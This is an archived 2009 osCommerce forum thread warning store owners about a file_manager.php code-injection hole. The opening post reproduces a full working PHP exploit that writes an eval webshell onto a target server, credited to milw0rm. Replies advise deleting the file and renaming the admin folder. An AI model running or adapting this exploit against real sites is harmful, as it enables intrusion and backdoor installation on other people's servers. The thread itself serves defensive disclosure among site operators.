Pipeloops Posted September 11, 2009 Share Posted September 11, 2009 Hi all, recently a couple of sites (including my own) have been hacked using a new exploit. Please have a look at this thread http://www.oscommerce.com/forums/index.php?showtopic=344272. The attacker installed a backdoor (c99madShell) and also added a stub into each and every php file on the site that would execute some code (don't know yet for what purpose) each time any page on your site is called up. This hack uses a recently discovered code injection exploit with file_manager.php. PLEASE NOTE: None of the measures in the "Secure your Site" thread prevent this attack! On my site all contributions mentioned in the thread are installed and active, and all folder and file attributes are set correctly, still I got hacked. And I just tried the exploit with the script (see below) again, and it still works when I reactivate the file manager. There is only ONE method to prevent this: Rename or delte file_manager.php, so the attacker does not find it!!! Here is the attack script. If you think you are safe, just insert your hostname in $host, put this file on your server (or run it locally in xampp), and see what you get when you visit the link it shows after running. I would appreciate if a mod can make this sticky, so it gets noticed by everybody! Thanks Reiner <?php print_r(' +---------------------------------------------------------------------------+ osCommerce Online Merchant 2.2 RC2a RCE Exploit by Flyh4t mail: [email protected] team: http://www.wolvez.org dork: Powered by osCommerce Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST Thx to exploits of blackh +---------------------------------------------------------------------------+ '); $host ='democn.51osc.com'; $path = '/'; $admin_path = 'admin/'; $shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>"; $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n"; $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $message.="Accept-Language: zh-cn\r\n"; $message.="Content-Type: application/x-www-form-urlencoded\r\n"; $message.="Accept-Encoding: gzip, deflate\r\n"; $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $message.="Host: $host\r\n"; $message.="Content-Length: ".strlen($shellcode)."\r\n"; $message.="Connection: Close\r\n\r\n"; $message.=$shellcode; $fd = fsockopen($host,'80'); if(!$fd) { echo '[~]No response from'.$host; die; } fputs($fd,$message); echo ("[+]Go to see U webshell : $host/fly.php"); ?> # milw0rm.com [2009-08-31] Link to comment Share on other sites More sharing options...
jackanderson Posted September 11, 2009 Share Posted September 11, 2009 Thanks for the heads up.. Really appreciate it.. Converge Link to comment Share on other sites More sharing options...
Giovanna Posted September 11, 2009 Share Posted September 11, 2009 This has been discussed already in july! (http://www.oscommerce.com/forums/index.php?showtopic=340995) removing the file_manager.php is a beginning as it shouldnt be used to edit your site anyway. If you see the code you posted it assumes the admin path is www.yoursite.com\admin. You are still vunerable if you leave your admin site as admin as they will find another way to hack in. So please everyone, folow the instructions in the link here and rename your admin. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.